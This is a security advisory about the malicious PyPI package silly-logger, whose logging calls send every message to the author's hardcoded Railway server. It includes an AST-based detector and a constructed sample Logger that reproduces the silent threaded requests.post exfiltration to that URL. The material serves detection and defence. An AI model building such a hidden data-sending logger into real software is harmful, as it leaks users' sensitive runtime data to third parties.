MAL-2026-4767
Malicious code in silly-logger (PyPI)
Details
## Source: amazon-inspector (2eecfbfdbeccf66833713755c8dffe5f7732119e5d82022a847c508dfef619b0)

The package advertises itself as a general-purpose logger, but every call to its debug/info/warn/error/critical methods unconditionally POSTs the caller-supplied message and source name to a hardcoded URL (https://lain-log-server.up.railway.app/log) on the author's Railway-hosted dashboard. `silly_logger/__init__.py` line 5 defines `URL = "https://lain-log-server.up.railway.app/log"` and line 42 fires it via `threading.Thread(target=requests.post, ...)`. There is no constructor parameter, environment variable, or config switch to disable, redirect, or self-host the destination. README usage examples encourage logging sensitive runtime events such as authentication and billing activity, all of which silently flow to the third-party endpoint. Any application that adopts this as its logging library will leak operational and potentially sensitive data to infrastructure controlled by the package author.
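A defender-side check for the pattern described above, added here as an example and not part of the advisory or of the package: an `ast`-based scanner that flags a Python module defining a module-level hardcoded `http(s)://` constant together with a `requests.*` network function, including when that function is handed to `threading.Thread` as a `target`. The sample source is constructed to mirror the reported structure (it is not the package's real code); `scan_dir` is an assumed helper for running the same check over an installed `site-packages` tree.

```python
import ast
from dataclasses import dataclass, field
from pathlib import Path

# Constructed sample reproducing the reported pattern (hardcoded URL constant,
# requests.post fired from a thread). Not the real package source.
SAMPLE = '''
import threading, requests
URL = "https://lain-log-server.up.railway.app/log"
class Logger:
    def __init__(self, source):
        self.source = source
    def info(self, msg):
        threading.Thread(target=requests.post,
                         kwargs={"url": URL, "json": {"src": self.source, "msg": msg}}).start()
'''

NET_FUNCS = {"post", "get", "put", "patch", "request"}

@dataclass
class Findings:
    urls: list = field(default_factory=list)      # (lineno, url) module-level URL constants
    net_refs: list = field(default_factory=list)  # (lineno, "requests.<func>") references
    threaded: list = field(default_factory=list)  # linenos where a requests.* is a Thread target

def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def scan_source(src: str) -> Findings:
    f, tree = Findings(), ast.parse(src)
    for node in tree.body:  # only top-level `NAME = "http..."` assignments
        if (isinstance(node, ast.Assign) and isinstance(node.value, ast.Constant)
                and isinstance(node.value.value, str)
                and node.value.value.startswith(("http://", "https://"))):
            f.urls.append((node.lineno, node.value.value))
    for node in ast.walk(tree):
        if isinstance(node, ast.Attribute):
            name = _dotted(node)
            if name and name.startswith("requests.") and node.attr in NET_FUNCS:
                f.net_refs.append((node.lineno, name))
        elif isinstance(node, ast.Call) and _dotted(node.func) == "threading.Thread":
            for kw in node.keywords:  # requests.* passed as target= (as reported)
                if kw.arg == "target" and (_dotted(kw.value) or "").startswith("requests."):
                    f.threaded.append(node.lineno)
    return f

def is_exfil_pattern(f: Findings) -> bool:
    """Hardcoded external URL plus a network call in the same module is the red flag."""
    return bool(f.urls) and bool(f.net_refs)

def scan_dir(root):  # assumed helper: yields (path, Findings) for each .py under root
    for p in Path(root).rglob("*.py"):
        yield p, scan_source(p.read_text(encoding="utf-8", errors="replace"))
```

Run `scan_dir` over a virtualenv's `site-packages` and review any module where `is_exfil_pattern` is true; a logging library should never hit either condition.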
Affected packages
No fixed version published yet for silly-logger (pip). Pin to a known-safe version or switch to an alternative.